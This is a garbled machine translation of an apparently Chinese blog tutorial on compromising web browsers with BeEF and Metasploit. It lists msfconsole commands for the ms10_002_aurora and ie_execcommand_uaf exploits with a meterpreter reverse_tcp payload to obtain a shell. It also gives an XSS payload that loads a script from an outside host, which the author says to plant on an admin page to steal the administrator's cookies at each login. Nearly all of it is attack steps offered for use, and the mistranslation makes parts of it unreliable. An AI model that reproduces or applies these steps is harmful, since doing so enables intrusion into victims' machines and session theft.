07, boeuf + msf prennent le shell client

(ie6 xp)

 

kali 1.0 est livré avec boeuf et msf

 

cd / usr / share / beef-xss

./du boeuf

Accéder à l'URL de l'interface utilisateur, le mot de passe du compte est boeuf

 

Configurer msf

msfconsole

utilisez windows / browser / ms10_002_aurora

définir PAYLOAD windows / meterpreter / reverse_tcp connect back

set SRVHOST ip address L'adresse cible accessible par le client

set SRVPOST 7777

définir URIPATH /

définir l'adresse IP LHOST Adresse reçue localement

set LPORT 4444

exploit

Ensuite, nous générerons une adresse que nous avons définie: ip: 7777, qui est l'url accessible aux utilisateurs.

Une fois la vulnérabilité déclenchée, nous reviendrons à notre adresse: ip: 4444

Le boeuf peut être entendu à ce moment

 

msf: sessions -i

sessions -i -

coquille

 

(ie 7 \ 8 \ 9)

utilisez exploit / windows / browser / ie_execcommand_uaf

définir l'IP SRVHOST

set SRVPOST 8888

définir URIPATH /

exploit

 

留 后门 : </tExtArEa> '"> <sCRiPt sRC = // xsshs.cn/2rQH> </sCrIpT>

Mettez ce code dans la page administrateur.

Après cela, l'administrateur peut obtenir des cookies chaque fois qu'il se connecte.

 

outil d'analyse xss: wvs \ coconut tree \ safe3 \ Xelenium \ w3af \ vega \ plug-in d'analyse xss + burp

A publié 782 articles originaux · J'aime 76 · Plus de 140 000 visites

Je suppose que tu aimes

Origine blog.csdn.net/qq_41723615/article/details/105498731
conseillé
Classement